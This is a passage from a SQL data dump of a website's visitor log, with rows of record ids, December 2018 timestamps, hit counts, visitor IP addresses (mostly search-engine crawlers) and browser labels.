44673994,1,1,0,0,'54.36.148.67','other'),(351048,1544674570,2,2,0,0,'54.165.59.7','other'),(351049,1544674604,1,1,0,0,'46.229.168.152','other'),(351050,1544674665,2,2,0,0,'178.154.244.11','other'),(351051,1544674769,3,3,0,0,'5.45.207.79','other'),(351052,1544674776,1,1,0,0,'54.36.149.19','other'),(351053,1544675164,1,1,0,0,'207.46.13.37','other'),(351054,1544675233,19,19,0,0,'5.9.140.242','other'),(351055,1544675796,1,1,0,0,'8.29.198.27','other'),(351056,1544675798,1,1,0,0,'46.229.168.140','other'),(351057,1544675818,1,1,0,0,'8.29.198.25','other'),(351058,1544675869,1,1,0,0,'207.46.13.34','other'),(351059,1544676081,1,1,0,0,'207.46.13.41','other'),(351060,1544676340,1,1,0,0,'5.45.207.79','other'),(351061,1544676412,1,1,0,0,'54.165.59.7','other'),(351062,1544676499,1,1,0,0,'66.249.66.40','chrome'),(351063,1544676520,1,1,0,0,'141.8.142.103','other'),(351064,1544676847,1,1,0,0,'95.163.255.95','other'),(351065,1544676850,1,1,0,0,'95.163.255.97','other'),(351066,1544677674,4,4,0,0,'5.45.207.19','other'),(351067,1544677696,1,1,0,0,'178.154.244.11','other'),(351068,1544677702,1,1,0,0,'5.45.207.79','other'),(351069,1544679137,3,3,0,0,'178.154.244.11','other'),(351070,1544679488,1,1,0,0,'66.249.66.155','chrome'),(351071,1544679490,1,1,0,0,'66.249.66.156','chrome'),(351072,1544679595,1,1,0,0,'141.8.142.103','other'),(351073,1544679600,3,3,0,0,'5.45.207.19','other'),(351074,1544679607,2,2,0,0,'95.108.213.4','other'),(351075,1544679771,2,2,0,0,'5.45.207.79','other'),(351076,1544679805,1,1,0,0,'39.104.230.85','other'),(351077,1544679944,1,1,0,0,'141.8.142.108','other'),(351078,1544680055,3,3,0,0,'178.154.244.11','other'),(351079,1544680483,1,1,0,0,'207.46.13.41','other'),(351080,1544680519,1,1,0,0,'91.196.178.48','chrome'),(351081,1544680639,1,1,0,0,'40.77.167.48','other'),(351082,1544681133,1,1,0,0,'46.229.168.132','other'),(351083,1544681135,1,1,0,0,'46.229.168.133','other'),(351084,1544681295,1,1,0,0,'66.249.66.37','chrome'),(351085,1544681297,2,2,0,0,'66.249.66.40','chrome'),(351086,1544681375,1,1,0,0,'66.249.66.156','chrome'),(351087,1544681376,1,1,0,0,'66.249.66.154','chrome'),(351088,1544681496,6,6,0,0,'5.45.207.19','other'),(351089,1544681504,9,9,0,0,'5.45.207.79','other'),(351090,1544681509,5,5,0,0,'87.250.224.47','other'),(351091,1544681513,1,1,0,0,'54.36.148.199','other'),(351093,1544681517,8,8,0,0,'178.154.244.11','other'),(351094,1544681523,2,2,0,0,'37.9.113.148','other'),(351095,1544681533,1,1,0,0,'46.229.168.142','other'),(351096,1544681544,1,1,0,0,'87.250.224.65','other'),(351097,1544681547,4,4,0,0,'95.108.213.4','other'),(351098,1544681603,2,2,0,0,'37.9.113.20','other'),(351099,1544681618,1,1,0,0,'5.45.207.8','other'),(351100,1544681630,1,1,0,0,'213.180.203.9','other'),(351101,1544681720,1,1,0,0,'37.9.113.103','other'),(351102,1544681733,3,3,0,0,'141.8.142.103','other'),(351103,1544681912,1,1,0,0,'54.36.148.78','other'),(351104,1544682486,6,6,0,0,'178.154.244.11','other'),(351105,1544682528,1,1,0,0,'66.249.66.154','chrome'),(351106,1544682532,2,2,0,0,'5.45.207.19','other'),(351107,1544682554,1,1,0,0,'66.249.66.156','chrome'),(351108,1544682556,1,1,0,0,'87.250.224.65','other'),(351109,1544682563,1,1,0,0,'87.250.224.47','other'),(351110,1544682676,1,1,0,0,'141.8.142.108','other'),(351111,1544682844,1,1,0,0,'66.249.66.59','chrome'),(351112,1544682943,2,2,0,0,'40.77.167.76','other'),(351113,1544683816,1,1,0,0,'95.163.255.99','other'),(351114,1544683818,1,1,0,0,'95.163.255.97','other'),(351115,1544683912,1,1,0,0,'66.249.66.156','chrome'),(351116,1544684046,2,2,0,0,'91.196.178.71','firefox'),(351117,1544684114,1,1,0,0,'66.249.66.44','chrome'),(351118,1544684355,2,2,0,0,'141.8.142.103','other'),(351119,1544684358,1,1,0,0,'5.45.207.19','other'),(351120,1544684359,1,1,0,0,'95.108.213.4','other'),(351121,1544684445,1,1,0,0,'66.249.66.154','chrome'),(351122,1544684515,1,1,0,0,'54.36.148.150','other'),(351123,1544684704,1,1,0,0,'54.36.148.58','other'),(351124,1544685063,1,1,0,0,'46.229.168.136','other'),(351125,1544685172,3,3,0,0,'91.196.178.169','chrome'),(351126,1544685215,1,0,1,0,'66.249.66.156',''),(351127,1544685627,1,1,0,0,'207.46.13.41','other'),(351128,1544685922,1,1,0,0,'66.249.66.155','chrome'),(351129,1544685923,1,1,0,0,'66.249.66.154','chrome'),(351130,1544686149,1,1,0,0,'46.229.168.136','other'),(351131,1544686382,1,1,0,0,'66.249.66.156','chrome'),(351132,1544686444,3,3,0,0,'91.196.178.169','chrome'),(351133,1544686634,2,2,0,0,'8.29.198.27','other'),(351134,1544686865,2,2,0,0,'77.123.109.50','firefox'),(351135,1544686883,2,2,0,0,'199.58.86.206','other'),(351136,1544687097,1,1,0,0,'54.36.148.255','other'),(351137,1544687208,1,1,0,0,'54.36.148.183','other'),(351138,1544687209,1,1,0,0,'37.55.225.27','chrome'),(351139,1544687288,1,1,0,0,'54.36.149.72','other'),(351140,1544687620,1,1,0,0,'38.145.97.114','chrome'),(351141,1544687622,1,1,0,0,'139.81.207.25','chrome'),(351142,1544687636,2,2,0,0,'207.46.13.86','other'),(351143,1544687681,1,1,0,0,'207.46.13.105','other'),(351144,1544687808,1,1,0,0,'66.249.66.154','chrome'),(351145,1544688138,1,1,0,0,'66.249.66.155','chrome'),(351146,1544688139,1,1,0,0,'66.249.66.156','chrome'),(351147,1544688563,1,1,0,0,'37.55.225.27','chrome'),(351148,1544688662,2,2,0,0,'91.196.178.94','chrome'),(351149,1544688708,1,1,0,0,'95.163.255.162','other'),(351150,1544688734,1,1,0,0,'66.249.66.57','chrome'),(351151,1544689115,1,1,0,0,'91.234.0.126','chrome'),(351152,1544689168,2,2,0,0,'194.37.248.11','chrome'),(351153,1544689184,1,1,0,0,'66.249.66.42','chrome'),(351154,1544689480,1,1,0,0,'66.249.66.152','chrome'),(351155,1544689626,1,1,0,0,'54.36.148.119','other'),(351156,1544689679,1,1,0,0,'54.36.148.226','other'),(351157,1544689714,1,1,0,0,'66.249.66.156','chrome'),(351158,1544689757,4,4,0,0,'91.196.178.94','chrome'),(351159,1544689901,1,1,0,0,'66.249.66.218','chrome'),(351160,1544690162,2,2,0,0,'91.196.178.71','firefox'),(351161,1544690178,3,3,0,0,'94.100.221.234','chrome'),(351162,1544690290,1,1,0,0,'175.138.57.125','other'),(351163,1544690419,3,3,0,0,'91.124.182.170','firefox'),(351164,1544690442,1,1,0,0,'37.55.225.14','chrome'),(351165,1544690570,1,1,0,0,'66.249.66.157','chrome'),(351166,1544690571,2,2,0,0,'66.249.66.154','chrome'),(351167,1544690662,2,2,0,0,'91.196.178.94','chrome'),(351168,1544690818,1,1,0,0,'207.46.13.86','other'),(351169,1544690914,1,1,0,0,'54.36.148.100','other'),(351170,1544691070,1,1,0,0,'157.55.39.150','other'),(351171,1544691121,1,1,0,0,'66.249.66.40','chrome'),(351172,1544691180,1,1,0,0,'94.100.221.234','chrome'),(351173,1544691665,1,1,0,0,'46.229.168.146','other'),(351174,1544691726,1,1,0,0,'89.178.238.106','msie'),(351175,1544692203,4,4,0,0,'178.154.244.11','other'),(351176,1544692216,1,1,0,0,'37.9.113.148','other'),(351177,1544692265,1,1,0,0,'94.100.221.234','chrome'),(351178,1544692589,1,1,0,0,'141.8.142.103','other'),(351179,1544692651,1,1,0,0,'54.36.149.0','other'),(351180,1544692665,1,1,0,0,'91.210.250.222','chrome'),(351181,1544692839,1,1,0,0,'157.55.39.150','other'),(351182,1544692863,1,1,0,0,'66.249.66.40','chrome'),(351183,1544692981,1,1,0,0,'95.163.255.119','other'),(351184,1544693110,2,2,0,0,'66.249.66.152','chrome'),(351185,1544693162,2,2,0,0,'66.249.66.156','chrome'),(351186,1544693305,1,1,0,0,'66.249.66.157','chrome'),(351187,1544693306,1,1,0,0,'66.249.66.154','chrome'),(351188,1544693309,1,1,0,0,'66.249.66.155','chrome'),(351189,1544693405,2,2,0,0,'40.77.167.36','other'),(351190,1544693697,1,1,0,0,'54.36.148.11','other'),(351191,1544693716,4,4,0,0,'5.45.207.79','other'),(351192,1544693883,1,1,0,0,'66.249.66.61','chrome'),(351193,1544694344,1,1,0,0,'5.45.207.19','other'),(351194,1544694368,1,1,0,0,'178.154.244.11','other'),(351195,1544694462,1,1,0,0,'66.249.66.154','chrome'),(351196,1544694685,1,1,0,0,'66.249.66.155','chrome'),(351198,1544695064,1,1,0,0,'95.163.255.118','other'),(351199,1544695116,1,1,0,0,'95.163.255.107','other'),(351200,1544695174,1,1,0,0,'95.163.255.114','other'),(351201,1544695284,2,2,0,0,'95.163.255.109','other'),(351202,1544695604,2,2,0,0,'212.90.183.78','chrome'),(351203,1544695650,1,1,0,0,'95.163.255.119','other'),(351204,1544695838,1,1,0,0,'54.36.149.60','other'),(351205,1544696044,1,0,1,0,'66.249.66.59',''),(351207,1544696057,4,4,0,0,'37.115.216.109','msie'),(351208,1544696078,3,3,0,0,'91.196.178.94','chrome'),(351209,1544696183,1,1,0,0,'178.95.255.142','chrome'),(351210,1544696222,4,4,0,0,'91.196.178.71','firefox'),(351211,1544696927,3,3,0,0,'157.55.39.150','other'),(351212,1544697121,1,1,0,0,'66.249.66.42','chrome'),(351213,1544697311,1,1,0,0,'54.36.148.113','other'),(351214,1544697477,1,1,0,0,'8.29.198.26','other'),(351215,1544697509,1,1,0,0,'8.29.198.25','other'),(351216,1544697732,2,2,0,0,'37.9.113.103','other'),(351217,1544697770,1,1,0,0,'66.102.9.40','chrome'),(351219,1544697775,5,5,0,0,'178.154.244.11','other'),(351220,1544697822,1,1,0,0,'40.77.167.36','other'),(351221,1544697835,2,2,0,0,'141.8.142.103','other'),(351222,1544697868,1,1,0,0,'5.45.207.79','other'),(351223,1544698221,1,1,0,0,'66.249.66.155','chrome'),(351224,1544698329,1,1,0,0,'66.249.66.156','chrome'),(351225,1544698330,2,2,0,0,'66.249.66.152','chrome'),(351226,1544698517,1,1,0,0,'87.250.224.65','other'),(351227,1544698533,1,1,0,0,'66.249.66.40','chrome'),(351228,1544698565,1,1,0,0,'5.45.207.19','other'),(351229,1544698580,1,1,0,0,'87.250.224.47','other'),(351230,1544698674,2,2,0,0,'40.77.167.148','other'),(351231,1544698734,1,1,0,0,'95.108.213.4','other'),(351232,1544698989,1,1,0,0,'157.55.39.150','other'),(351233,1544699504,1,1,0,0,'54.36.149.73','other'),(351234,1544699905,1,1,0,0,'46.229.168.145','other'),(351235,1544699946,2,2,0,0,'66.249.66.154','chrome'),(351236,1544700126,1,1,0,0,'66.249.66.201','chrome'),(351237,1544700135,1,1,0,0,'91.196.178.71','firefox'),(351238,1544700431,1,1,0,0,'54.36.148.241','other'),(351239,1544700470,1,1,0,0,'66.249.66.44','chrome'),(351240,1544700516,1,1,0,0,'66.249.66.152','chrome'),(351241,1544700751,1,1,0,0,'159.224.182.247','other'),(351242,1544700809,2,2,0,0,'91.242.162.19','other'),(351243,1544701042,1,1,0,0,'46.229.168.137','other'),(351244,1544701280,1,0,1,0,'66.249.66.199',''),(351245,1544701282,1,0,1,0,'66.249.66.154',''),(351246,1544701457,1,0,1,0,'66.249.66.40',''),(351247,1544701472,1,1,0,0,'46.229.168.145','other'),(351248,1544701529,1,0,1,0,'66.249.66.42',''),(351249,1544701539,1,1,0,0,'66.249.66.157','chrome'),(351250,1544701565,1,1,0,0,'66.249.66.156','chrome'),(351251,1544701850,1,1,0,0,'66.249.66.154','chrome'),(351252,1544702101,1,1,0,0,'46.229.168.151','other'),(351253,1544702432,1,1,0,0,'66.249.66.44','chrome'),(351254,1544702627,2,2,0,0,'37.52.87.173','chrome'),(351255,1544702697,1,1,0,0,'54.36.148.51','other'),(351256,1544703397,1,1,0,0,'46.229.168.152','other'),(351257,1544703609,2,2,0,0,'91.196.178.94','chrome'),(351258,1544703623,1,1,0,0,'66.249.66.156','chrome'),(351260,1544704679,2,2,0,0,'91.124.182.170','firefox'),(351261,1544704732,1,1,0,0,'54.36.148.181','other'),(351262,1544704809,1,1,0,0,'40.77.167.36','other'),(351263,1544705056,1,1,0,0,'46.229.168.135','other'),(351264,1544705183,1,1,0,0,'87.250.224.47','other'),(351265,1544705209,3,3,0,0,'141.8.142.103','other'),(351266,1544705224,2,2,0,0,'5.45.207.19','other'),(351267,1544705237,1,1,0,0,'37.9.113.148','other'),(351268,1544705295,1,1,0,0,'213.180.203.9','other'),(351269,1544705309,2,2,0,0,'5.45.207.79','other'),(351270,1544705392,1,1,0,0,'87.250.224.65','other'),(351271,1544705717,6,6,0,0,'178.154.244.11','other'),(351272,1544706254,2,2,0,0,'5.45.207.79','other'),(351273,1544706327,1,1,0,0,'95.163.255.98','other'),(351274,1544706330,1,1,0,0,'95.163.255.99','other'),(351275,1544706396,1,1,0,0,'87.250.224.47','other'),(351276,1544706438,2,2,0,0,'5.45.207.19','other'),(351277,1544706451,1,1,0,0,'157.55.39.150','other'),(351278,1544706453,2,2,0,0,'91.196.177.26','chrome'),(351279,1544706520,2,2,0,0,'91.124.204.125','chrome'),(351280,1544706794,1,1,0,0,'95.108.181.54','other'),(351281,1544706804,1,1,0,0,'94.179.160.101','chrome'),(351282,1544706943,1,1,0,0,'54.36.148.197','other'),(351283,1544707104,1,1,0,0,'66.249.66.156','chrome'),(351284,1544707110,2,2,0,0,'66.249.66.152','chrome'),(351285,1544707236,1,1,0,0,'95.108.213.4','other'),(351286,1544707489,1,1,0,0,'46.229.168.151','other'),(351287,1544707491,1,1,0,0,'46.229.168.146','other'),(351288,1544708150,1,1,0,0,'66.249.66.152','chrome'),(351289,1544708319,1,1,0,0,'8.29.198.26','other'),(351290,1544708360,1,1,0,0,'8.29.198.27','other'),(351291,1544708627,1,1,0,0,'66.249.66.40','chrome'),(351292,1544708908,1,1,0,0,'31.170.139.66','firefox'),(351293,1544709124,1,1,0,0,'31.43.31.121','firefox'),(351294,1544709346,3,3,0,0,'91.196.178.169','chrome'),(351295,1544709742,1,1,0,0,'66.249.66.44','chrome'),(351296,1544709752,2,2,0,0,'66.249.66.156','chrome'),(351297,1544710101,1,1,0,0,'66.249.66.218','chrome'),(351298,1544710153,1,1,0,0,'46.229.168.141','other'),(351299,1544710262,1,1,0,0,'54.36.148.234','other'),(351300,1544710340,1,1,0,0,'91.196.178.182','chrome'),(351301,1544710341,1,1,0,0,'194.1.195.225','firefox'),(351302,1544710477,1,1,0,0,'54.165.59.7','other'),(351303,1544710617,1,1,0,0,'141.8.142.103','other'),(351306,1544710618,1,1,0,0,'5.45.207.79','other'),(351307,1544710784,1,1,0,0,'18.184.52.215','other'),(351308,1544710843,1,1,0,0,'37.55.241.246','chrome'),(351309,1544710866,1,1,0,0,'46.229.168.148','other'),(351310,1544710868,1,1,0,0,'46.229.168.149','other'),(351311,1544711043,2,2,0,0,'66.249.66.156','chrome'),(351312,1544711062,2,2,0,0,'66.249.66.154','chrome'),(351313,1544711366,1,1,0,0,'46.33.49.91','chrome'),(351314,1544711494,1,1,0,0,'66.249.66.222','chrome'),(351315,1544711824,1,1,0,0,'95.163.255.99','other'),(351316,1544711827,1,1,0,0,'95.163.255.93','other'),(351317,1544712005,1,1,0,0,'66.249.66.152','chrome'),(351318,1544712024,1,1,0,0,'40.77.167.148','other'),(351319,1544712084,2,2,0,0,'46.219.77.169','chrome'),(351320,1544712345,1,1,0,0,'95.163.255.185','other'),(351321,1544712349,1,1,0,0,'95.163.255.194','other'),(351322,1544712490,2,2,0,0,'91.196.178.182','chrome'),(351323,1544712503,1,1,0,0,'176.113.209.232','chrome'),(351324,1544713475,2,2,0,0,'95.132.29.225','chrome'),(351325,1544713502,2,2,0,0,'91.196.178.71','firefox'),(351326,1544713902,1,1,0,0,'40.77.167.36','other'),(351327,1544713968,1,1,0,0,'87.250.224.65','other'),(351328,1544713977,4,4,0,0,'5.45.207.79','other'),(351329,1544713987,5,5,0,0,'5.45.207.19','other'),(351330,1544714008,3,3,0,0,'178.154.244.11','other'),(351331,1544714065,2,2,0,0,'91.242.162.19','other'),(351332,1544714086,1,1,0,0,'91.196.178.179','chrome'),(351333,1544714096,3,3,0,0,'141.8.142.103','other'),(351334,1544714103,1,1,0,0,'40.77.167.148','other'),(351335,1544714105,1,1,0,0,'66.249.66.157','chrome'),(351336,1544714115,1,1,0,0,'66.249.66.154','chrome'),(351337,1544714155,1,1,0,0,'95.108.213.4','other'),(351338,1544714880,2,2,0,0,'66.249.66.42','chrome'),(351339,1544715109,5,5,0,0,'212.26.134.106','chrome'),(351340,1544715339,2,2,0,0,'66.249.66.154','chrome'),(351341,1544715351,1,1,0,0,'66.249.66.156','chrome'),(351342,1544715352,2,2,0,0,'66.249.66.152','chrome'),(351343,1544715358,1,1,0,0,'54.36.148.25','other'),(351344,1544715375,1,1,0,0,'173.252.95.26','other'),(351345,1544716033,2,2,0,0,'92.112.230.113','firefox'),(351346,1544716081,2,2,0,0,'185.234.219.222','msie'),(351347,1544716208,1,1,0,0,'66.249.66.157','chrome'),(351348,1544716619,1,1,0,0,'54.36.148.101','other'),(351349,1544716639,1,1,0,0,'180.76.15.138','other'),(351350,1544716640,1,1,0,0,'180.76.15.30','other'),(351351,1544716799,1,1,0,0,'54.36.148.242','other'),(351352,1544716831,2,2,0,0,'91.209.11.236','other'),(351353,1544716920,1,1,0,0,'54.36.149.95','other'),(351354,1544716929,1,1,0,0,'40.77.167.36','other'),(351355,1544717056,1,1,0,0,'66.249.66.154','chrome'),(351356,1544717278,1,1,0,0,'66.249.66.42','chrome'),(351357,1544717388,1,1,0,0,'95.134.203.233','chrome'),(351358,1544717540,4,4,0,0,'178.154.244.11','other'),(351359,1544717686,2,2,0,0,'5.45.207.79','other'),(351360,1544717752,1,1,0,0,'37.73.254.226','chrome'),(351361,1544717824,1,1,0,0,'95.163.255.177','other'),(351362,1544717827,1,1,0,0,'95.163.255.161','other'),(351363,1544717870,1,1,0,0,'95.163.255.63','other'),(351364,1544717871,2,2,0,0,'95.163.255.69','other'),(351365,1544717873,1,1,0,0,'95.163.255.68','other'),(351366,1544717898,7,7,0,0,'5.45.207.19','other'),(351367,1544717929,1,1,0,0,'31.13.127.1','other'),(351368,1544717969,2,2,0,0,'91.196.178.71','firefox'),(351369,1544718294,3,3,0,0,'141.8.142.103','other'),(351370,1544718297,2,2,0,0,'87.250.224.65','other'),(351371,1544718304,1,1,0,0,'66.249.66.40','chrome'),(351372,1544718317,4,4,0,0,'95.108.213.4','other'),(351373,1544718444,4,4,0,0,'178.154.244.11','other'),(351374,1544718660,1,1,0,0,'195.69.223.157','other'),(351375,1544718724,3,3,0,0,'5.45.207.79','other'),(351376,1544718729,1,1,0,0,'40.77.167.148','other'),(351377,1544718818,2,2,0,0,'5.45.207.19','other'),(351378,1544719048,1,1,0,0,'46.147.161.157','chrome'),(351379,1544719161,1,1,0,0,'8.29.198.26','other'),(351380,1544719200,1,1,0,0,'8.29.198.25','other'),(351381,1544719215,1,1,0,0,'141.8.142.103','other'),(351382,1544719276,1,1,0,0,'46.211.113.7','chrome'),(351383,1544719345,1,1,0,0,'141.8.142.144','other'),(351384,1544719535,1,1,0,0,'178.154.244.11','other'),(351385,1544719681,1,1,0,0,'91.236.127.10','chrome'),(351386,1544720354,1,1,0,0,'66.249.66.152','chrome'),(351387,1544720382,1,1,0,0,'66.249.66.154','chrome'),(351388,1544721005,1,1,0,0,'66.249.66.157','chrome'),(351389,1544721006,1,1,0,0,'66.249.66.156','chrome'),(351390,1544721150,2,2,0,0,'91.196.178.130','firefox'),(351391,1544722326,1,1,0,0,'66.249.66.152','chrome'),(351392,1544722412,1,1,0,0,'66.249.66.156','chrome'),(351393,1544722413,1,1,0,0,'66.249.66.154','chrome'),(351394,1544723527,1,1,0,0,'157.55.39.150','other'),(351395,1544723789,1,1,0,0,'66.249.66.40','chrome'),(351396,1544723820,1,1,0,0,'66.249.66.156','chrome'),(351397,1544723845,2,2,0,0,'66.249.66.152','chrome'),(351398,1544723898,1,1,0,0,'5.188.210.53','chrome'),(351399,1544723988,1,1,0,0,'66.249.66.154','chrome'),(351400,1544724436,1,1,0,0,'46.229.168.132','other'),(351401,1544724827,2,2,0,0,'91.196.178.189','chrome'),(351402,1544724949,2,2,0,0,'94.179.246.96','firefox'),(351403,1544725185,1,1,0,0,'46.229.168.146','other'),(351404,1544725257,2,2,0,0,'66.249.66.152','chrome'),(351405,1544725376,1,1,0,0,'157.55.39.201','other'),(351406,1544725397,1,1,0,0,'66.249.66.157','chrome'),(351407,1544725570,1,1,0,0,'40.77.167.36','other'),(351408,1544725782,1,1,0,0,'157.55.39.150','other'),(351409,1544727397,2,2,0,0,'91.209.11.236','other'),(351410,1544727562,1,1,0,0,'66.249.66.59','chrome'),(351411,1544727591,1,1,0,0,'37.115.204.89','chrome'),(351412,1544727935,1,1,0,0,'157.55.39.150','other'),(351413,1544728038,4,4,0,0,'178.154.244.11','other'),(351414,1544728069,4,4,0,0,'141.8.142.103','other'),(351415,1544728167,4,4,0,0,'5.45.207.19','other'),(351416,1544728253,1,1,0,0,'95.108.213.4','other'),(351417,1544728396,1,1,0,0,'87.250.224.47','other'),(351418,1544729118,1,1,0,0,'40.77.167.36','other'),(351419,1544729313,1,1,0,0,'157.55.39.201','other'),(351420,1544729346,4,4,0,0,'5.45.207.79','other'),(351421,1544729420,2,2,0,0,'91.209.11.236','other'),(351422,1544729427,1,1,0,0,'178.154.244.11','other'),(351423,1544729665,1,1,0,0,'5.45.207.19','other'),(351424,1544729689,1,1,0,0,'178.154.200.48','other'),(351425,1544729723,1,1,0,0,'46.229.168.144','other'),(351426,1544729849,1,1,0,0,'37.9.113.20','other'),(351427,1544730000,2,2,0,0,'8.29.198.25','other'),(351428,1544730876,1,1,0,0,'46.229.168.136','other'),(351429,1544731657,1,1,0,0,'46.211.71.24','chrome'),(351430,1544731705,1,1,0,0,'46.229.168.139','other'),(351431,1544731790,1,1,0,0,'66.249.66.152','chrome'),(351432,1544731847,1,1,0,0,'46.229.168.153','other'),(351433,1544731848,1,1,0,0,'46.229.168.132','other'),(351434,1544732584,4,4,0,0,'91.196.178.50','chrome'),(351435,1544732628,1,1,0,0,'54.36.148.169','other'),(351436,1544733232,1,1,0,0,'46.229.168.145','other'),(351437,1544733318,1,1,0,0,'54.36.148.181','other'),(351438,1544733828,1,1,0,0,'46.229.168.136','other'),(351439,1544733830,1,1,0,0,'46.229.168.151','other'),(351440,1544734007,1,1,0,0,'95.163.255.157','other'),(351441,1544734009,1,1,0,0,'95.163.255.170','other'),(351442,1544734168,1,1,0,0,'66.249.66.156','chrome'),(351443,1544734245,1,1,0,0,'46.229.168.132','other'),(351444,1544734247,1,1,0,0,'46.229.168.130','other'),(351445,1544734261,1,1,0,0,'66.249.66.152','chrome'),(351446,1544734296,1,1,0,0,'66.249.66.42','chrome'),(351447,1544734340,1,1,0,0,'141.8.142.103','other'),(351448,1544734341,1,1,0,0,'5.45.207.79','other'),(351451,1544734353,1,1,0,0,'54.36.148.61','other'),(351452,1544734487,1,1,0,0,'54.36.148.151','other'),(351453,1544734527,2,2,0,0,'91.196.178.189','chrome'),(351454,1544734763,3,3,0,0,'66.249.66.40','chrome'),(351455,1544735122,1,1,0,0,'46.229.168.150','other'),(351456,1544735124,1,1,0,0,'46.229.168.151','other'),(351457,1544735671,2,2,0,0,'66.249.66.154','chrome'),(351458,1544735792,1,1,0,0,'54.36.148.231','other'),(351459,1544735866,1,1,0,0,'66.249.66.152','chrome'),(351460,1544735998,2,2,0,0,'157.55.39.201','other'),(351461,1544736127,1,1,0,0,'66.249.66.156','chrome'),(351462,1544736242,2,2,0,0,'66.249.66.40','chrome'),(351463,1544736436,1,1,0,0,'54.36.148.91','other'),(351464,1544736440,1,1,0,0,'91.196.178.189','chrome'),(351465,1544736856,1,1,0,0,'66.249.66.152','chrome'),(351466,1544736886,1,1,0,0,'157.55.39.150','other'),(351467,1544736966,1,1,0,0,'66.249.66.154','chrome'),(351468,1544737434,6,6,0,0,'5.45.207.79','other'),(351469,1544737543,1,1,0,0,'157.55.39.201','other'),(351470,1544737583,8,8,0,0,'178.154.244.11','other'),(351471,1544737698,3,3,0,0,'141.8.142.103','other'),(351472,1544737860,1,1,0,0,'95.163.255.96','other'),(351473,1544737863,1,1,0,0,'95.163.255.93','other'),(351474,1544738138,2,2,0,0,'5.45.207.19','other'),(351475,1544738232,1,1,0,0,'87.250.224.47','other'),(351476,1544738337,1,1,0,0,'5.45.207.79','other'),(351477,1544738683,1,1,0,0,'66.249.66.152','chrome'),(351478,1544739006,1,1,0,0,'46.229.168.154','other'),(351479,1544739195,1,1,0,0,'66.249.66.156','chrome'),(351480,1544739296,1,1,0,0,'54.36.148.99','other'),(351481,1544739686,1,1,0,0,'66.249.66.40','chrome'),(351482,1544739808,1,1,0,0,'66.249.66.42','chrome'),(351483,1544739979,2,2,0,0,'66.249.66.152','chrome'),(351484,1544739984,1,1,0,0,'46.229.168.142','other'),(351485,1544740049,2,2,0,0,'66.249.66.154','chrome'),(351486,1544740339,2,2,0,0,'157.55.39.201','other'),(351487,1544740718,2,2,0,0,'66.249.66.156','chrome'),(351488,1544740798,1,1,0,0,'46.229.168.154','other'),(351489,1544740838,1,1,0,0,'8.29.198.26','other'),(351490,1544740901,1,1,0,0,'8.29.198.25','other'),(351491,1544740958,1,1,0,0,'54.36.148.88','other'),(351492,1544741363,1,1,0,0,'54.36.148.111','other'),(351493,1544741389,1,1,0,0,'66.249.66.40','chrome'),(351494,1544741657,1,1,0,0,'66.249.66.44','chrome'),(351495,1544741772,1,1,0,0,'46.229.168.132','other'),(351496,1544741774,1,1,0,0,'46.229.168.130','other'),(351497,1544741800,1,1,0,0,'66.249.66.152','chrome'),(351498,1544741895,1,1,0,0,'54.36.148.33','other'),(351499,1544742551,1,1,0,0,'54.36.148.247','other'),(351500,1544742839,1,1,0,0,'46.229.168.153','other'),(351501,1544742920,1,1,0,0,'46.229.168.140','other'),(351502,1544742922,2,2,0,0,'66.249.66.156','chrome'),(351504,1544743037,1,1,0,0,'66.249.66.40','chrome'),(351505,1544743093,3,3,0,0,'66.249.66.154','chrome'),(351506,1544743096,1,1,0,0,'66.249.66.44','chrome'),(351507,1544743192,1,1,0,0,'54.36.148.214','other'),(351508,1544743260,1,1,0,0,'66.249.66.42','chrome'),(351509,1544743886,1,1,0,0,'46.229.168.143','other'),(351510,1544744148,1,1,0,0,'66.249.66.156','chrome'),(351511,1544744336,1,1,0,0,'54.36.149.99','other'),(351512,1544744368,1,1,0,0,'66.249.66.152','chrome'),(351513,1544744575,1,1,0,0,'54.36.149.10','other'),(351514,1544744746,1,1,0,0,'54.36.149.49','other'),(351515,1544744957,1,1,0,0,'54.36.149.11','other'),(351516,1544745846,1,1,0,0,'66.249.66.42','chrome'),(351517,1544745857,2,2,0,0,'91.209.11.236','other'),(351518,1544745902,2,2,0,0,'66.249.66.156','chrome'),(351519,1544746239,1,1,0,0,'157.55.39.201','other'),(351520,1544746419,1,1,0,0,'54.36.148.238','other'),(351521,1544746481,1,1,0,0,'5.255.253.38','other'),(351522,1544746502,6,6,0,0,'178.154.244.11','other'),(351523,1544746538,2,2,0,0,'5.45.207.19','other'),(351524,1544746637,1,1,0,0,'66.249.66.40','chrome'),(351525,1544746769,1,1,0,0,'66.249.66.152','chrome'),(351526,1544746809,1,1,0,0,'157.55.39.139','other'),(351527,1544746962,1,1,0,0,'87.250.224.65','other'),(351528,1544747010,2,2,0,0,'5.45.207.79','other'),(351529,1544747087,3,3,0,0,'141.8.142.103','other'),(351530,1544747156,1,1,0,0,'213.180.203.9','other'),(351531,1544747651,4,4,0,0,'178.154.244.11','other'),(351532,1544747699,1,1,0,0,'5.45.207.19','other'),(351533,1544747785,1,1,0,0,'37.9.113.148','other'),(351534,1544747810,2,2,0,0,'157.55.39.216','other'),(351535,1544747917,1,1,0,0,'37.9.113.103','other'),(351536,1544748226,1,1,0,0,'54.36.148.133','other'),(351537,1544748310,1,1,0,0,'46.229.168.149','other'),(351538,1544748312,1,1,0,0,'46.229.168.136','other'),(351539,1544748369,3,3,0,0,'66.249.66.152','chrome'),(351540,1544748481,3,3,0,0,'66.249.66.156','chrome'),(351541,1544748668,2,2,0,0,'66.249.66.154','chrome'),(351542,1544748974,1,1,0,0,'39.98.52.133','other'),(351543,1544748980,1,1,0,0,'185.100.87.129','other'),(351544,1544749818,1,1,0,0,'46.229.168.129','other'),(351545,1544749904,1,1,0,0,'54.36.148.159','other'),(351546,1544750016,1,1,0,0,'54.36.148.248','other'),(351547,1544750286,1,1,0,0,'46.229.168.152','other'),(351548,1544750510,1,1,0,0,'40.77.167.179','other'),(351549,1544750601,1,1,0,0,'157.55.39.139','other'),(351550,1544750752,1,1,0,0,'66.249.66.152','chrome'),(351551,1544750827,1,1,0,0,'40.77.167.36','other'),(351552,1544751148,1,1,0,0,'46.229.168.147','other'),(351553,1544751676,1,1,0,0,'8.29.198.27','other'),(351554,1544751680,1,1,0,0,'54.36.149.50','other'),(351555,1544751746,2,2,0,0,'54.202.69.184','chrome'),(351556,1544751753,1,1,0,0,'46.229.168.144','other'),(351557,1544751754,1,1,0,0,'8.29.198.25','other'),(351558,1544751952,1,1,0,0,'46.229.168.133','other'),(351559,1544752095,1,1,0,0,'46.229.168.136','other'),(351560,1544752134,1,1,0,0,'66.249.66.152','chrome'),(351561,1544752146,1,1,0,0,'157.